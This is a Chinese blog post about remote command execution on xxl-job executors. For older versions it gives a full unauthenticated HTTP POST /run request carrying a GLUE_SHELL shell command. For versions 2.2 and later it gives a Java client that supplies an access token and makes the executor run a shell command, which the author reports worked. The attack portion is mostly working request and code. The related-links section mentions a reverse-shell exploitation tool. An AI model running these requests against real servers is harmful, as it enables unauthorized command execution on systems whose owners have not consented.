xxl-job 2.2之后版本高版本executor未授权访问漏洞

最新推荐文章于 2024-03-02 10:00:00 发布
最新推荐文章于 2024-03-02 10:00:00 发布
阅读量6.2k 收藏
点赞数
分类专栏: 安全 文章标签: 开发语言 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/133377854
版权

xxl-job 低版本executor未授权访问

低版本的executor未授权访问漏洞是

POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "touch /tmp/success",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

高版本的改变

高版本访问相同的接口就会出现这样的页面
在这里插入图片描述

因为高版本的executor变成了用hessian2反序列化进行传递数据,而且官方为了安全还加上了accessToken进行安全验证,xxl-job还加上了如果遇到合适版本的hessian2,可以考虑反序列化攻击,也可以找找官方的测试代码,下载官方代码之后找到ExecutorBizTest
在这里插入图片描述
我在下面贴上自己测试成功,能执行命令的代码

package com.xxl.job.executor;

import com.xxl.job.core.biz.ExecutorBiz;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.biz.model.TriggerParam;
import com.xxl.job.core.enums.ExecutorBlockStrategyEnum;
import com.xxl.job.core.glue.GlueTypeEnum;
import com.xxl.rpc.remoting.invoker.XxlRpcInvokerFactory;
import com.xxl.rpc.remoting.invoker.call.CallType;
import com.xxl.rpc.remoting.invoker.reference.XxlRpcReferenceBean;
import com.xxl.rpc.remoting.invoker.route.LoadBalance;
import com.xxl.rpc.remoting.net.impl.netty_http.client.NettyHttpClient;
import com.xxl.rpc.serialize.impl.HessianSerializer;

/**
 * executor-api client, test
 *
 * Created by xuxueli on 17/5/12.
 */
public class ExecutorBizTest {

    public static void main(String[] args) throws Exception {

        // param
        String jobHandler = "demoJobHandler";
        String params = "";

        runTest(jobHandler, params);
    }

    /**
     * run jobhandler
     *
     * @param jobHandler
     * @param params
     */
    private static void runTest(String jobHandler, String params) throws Exception {
        // trigger data
        TriggerParam triggerParam = new TriggerParam();
        triggerParam.setJobId(4);
        triggerParam.setExecutorHandler(jobHandler);
        triggerParam.setExecutorParams(params);
        triggerParam.setExecutorBlockStrategy(ExecutorBlockStrategyEnum.COVER_EARLY.name());
        triggerParam.setGlueType(GlueTypeEnum.GLUE_SHELL.name());
        triggerParam.setGlueSource("#!/bin/bash\n id");
        triggerParam.setGlueUpdatetime(System.currentTimeMillis());
        triggerParam.setLogId(8888);
        triggerParam.setLogDateTime(System.currentTimeMillis());

        // do remote trigger
        String accessToken = "heheda";

        XxlRpcReferenceBean referenceBean = new XxlRpcReferenceBean();

        referenceBean.setClient(NettyHttpClient.class);
        referenceBean.setSerializer(HessianSerializer.class);
        referenceBean.setCallType(CallType.SYNC);
        referenceBean.setLoadBalance(LoadBalance.ROUND);
        referenceBean.setIface(ExecutorBiz.class);
        referenceBean.setVersion(null);
        referenceBean.setTimeout(3000);
        referenceBean.setAddress("127.0.0.1:7056");
        referenceBean.setAccessToken(accessToken);
        referenceBean.setInvokeCallback(null);
        referenceBean.setInvokerFactory(null);

        ExecutorBiz executorBiz = (ExecutorBiz) referenceBean.getObject();

        ReturnT<String> runResult = executorBiz.run(triggerParam);

        System.out.println(runResult);
        XxlRpcInvokerFactory.getInstance().stop();
    }

}

这个代码执行完了没有回显,但是确实执行成功了,后面研究一下怎么拿到回显

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与资源作者无关。该资源仅供学习用途使用!!!!!!!!!!!!)
go-xxl-executor-master
06-19
go-xxl-executor-master
XXL-JOB executor 授权访问漏洞
最新发布
xnxqwzy的博客
03-02 1043
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。:<=2.2.0。
Goby 漏洞发布|XXL-JOB accessToken 权限绕过漏洞
m0_46699477的博客
11-02 1169
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 存在默认 accessToken ,攻击者可使用 accessToken 绕过认证权限,调用 executor,执行任意代码,从而获取服务器权限。
xxl-job-执行器-RESTful-API-授权访问-RCE
qq_41659863的博客
10-24 2751
xxl-job-执行器 后台 漏洞复现
CodeQL分析XXL-JOB默认accessToken命令执行漏洞
INSBUG的博客
11-10 856
accessToken 本来是为了修复2020年xxl-job 执行器executor RESTful API 授权访问 RCE 漏洞,为了防止其授权添加了accessToken校验,但是很多人在使用该框架的时候并修改其默认的值xxl.job.accessToken=default_token,与之前shiro的默认key泄漏导致的RCE原理很相似。CodeQL本质上和其他的代码审计工具没什么不同,都是通过规则来查询疑似有安全问题的代码,只是分析技术不同而已,且规则自由度大。
漏洞分析|XXL-JOB accessToken 存在身份认证绕过漏洞
xuandaoren的博客
11-09 2109
官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值。XXL-JOB是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。Web IDE:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。Shell、Python、NodeJS、PHP、PowerShell……XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “
漏洞库】XXL-JOB executor 授权访问漏洞导致RCE
yuan_boss的博客
11-03 793
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/
XXL-JOB v2.4.0 发布 | 安全漏洞修复
许雪里
03-23 1722
XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8Hjsl4t-1586859195388)(https://upload-images.jianshu.io/upload_images/3165072-2124d438362d68e5.png “在这里输入图片标题”)]
xxl-job反序列化漏洞分析复现
panda的博客
10-20 3600
xxl-job反序列化分析复现
xxl-job-executor:与xxl-job-executor的集成
04-19
xxl-job-executor的gin中间件背景xxl-job-executor-go是xxl-job的golang执行器,可以独立运行,有时候我们要与项目或者框架(如:gin框架)集成起来合并为一个服务,本项目因此而生。执行器项目地址与gin集成示例...
xxl-job-executor-go-master
06-19
xxl-job-executor-go-master
xxl-job-admin、xxl-job-core、xxl-job-executor 的源码引入项目中.docx
07-03
xxl-job-admin 作为调度中心,有可视化的web...至于xxl-job-executor,它是和我们项目结合最紧密的,也是需要我们自定义的,那么我们参考官方的示例即可,不需要引入 xxl-job-executor 示例源码项目搭建,项目结构如下
xxl-job+执行器jar包(xxl-job-executor-sample-springboot-2.2.0.jar)
03-23
xxl-job-executor-sample-springboot-2.2.0.jar 与xxl-job配套的执行器包,用于 Docker-compose搭建xxl-job(并配置Python3环境xxl-job执行器) 中相应的文件
使用ysoserial生成反序列化文件
热门推荐
一个码农的笔记
06-01 2万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
jar重新打包
一个码农的笔记
05-05 2万+
首先
破解md5的python代码,持续更新
一个码农的笔记
09-22 1万+
# -*- coding: utf-8 -*- import string import hashlib file=open("hello.txt","a") md5input=raw_input("请输入md5:\n") md5input=md5input.lower() apt=string.printable[:-6] def dfs(s,num): m=hashlib.md5()
简单的方式挖掘和利用soap的sql注入
一个码农的笔记
10-29 1万+
1.首先soap是什么: 对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP 
xxl-job内存过
07-29
你好!对于xxl-job内存过的问题,我可以为你提供一些可能的解决方案。请注意,这些只是一些常见的解决方案,具体取决于你的系统和使用情况。 1. 调整JVM内存参数:你可以尝试调整xxl-job服务的JVM内存参数,增加堆内存或者调整垃圾回收器的设置。可以通过修改`xxl-job-admin`或者`xxl-job-executor`的启动脚本中的`-Xmx`和`-Xms`参数来实现。 2. 检查任务配置:检查你的任务配置,确保任务的资源使用合理。如果任务需要大量内存,可能需要调整任务的执行策略或者分散任务到多个执行器上。 3. 优化SQL查询:如果你的任务涉及到数据库操作,可以检查是否存在慢查询或者没有合适的索引。优化SQL查询可以减少内存使用。 4. 减少任务并发数:如果系统中同时运行的任务过多,可以适当减少任务的并发数,减少内存压力。 5. 升级xxl-job版本:如果你使用的是较旧版本xxl-job,尝试升级到最新版本,可能有一些性能优化和内存管理方面的改进。 这些是一些常见的解决方案,希望能对你有所帮助。如果问题仍然存在,请提供更多的详细信息,以便我能够给出更具体的建议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值